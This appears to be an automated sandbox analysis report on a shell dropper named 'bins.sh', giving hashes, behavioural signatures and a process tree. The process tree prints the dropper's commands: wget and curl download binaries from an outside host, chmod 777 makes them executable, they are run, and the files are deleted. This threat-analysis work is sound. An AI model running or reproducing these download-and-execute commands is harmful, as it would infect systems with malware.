Analysis
-
max time kernel
139s -
max time network
151s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
05/12/2024, 07:52
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
4ec351f49dc5766e37b9f2ca107ea79f
-
SHA1
1e9e758cc6d6441d23748b0a346dcfc1df30e105
-
SHA256
c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661
-
SHA512
5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c
-
SSDEEP
192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 810 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB 811 zZM090BtLw96clc18K3325Bi3InWJUorwB -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 722 curl 730 busybox 815 wget 707 wget -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB wget File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:707
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- System Network Configuration Discovery
PID:730
-
-
/bin/chmodchmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB./zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵PID:814
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG2⤵
- System Network Configuration Discovery
PID:815
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f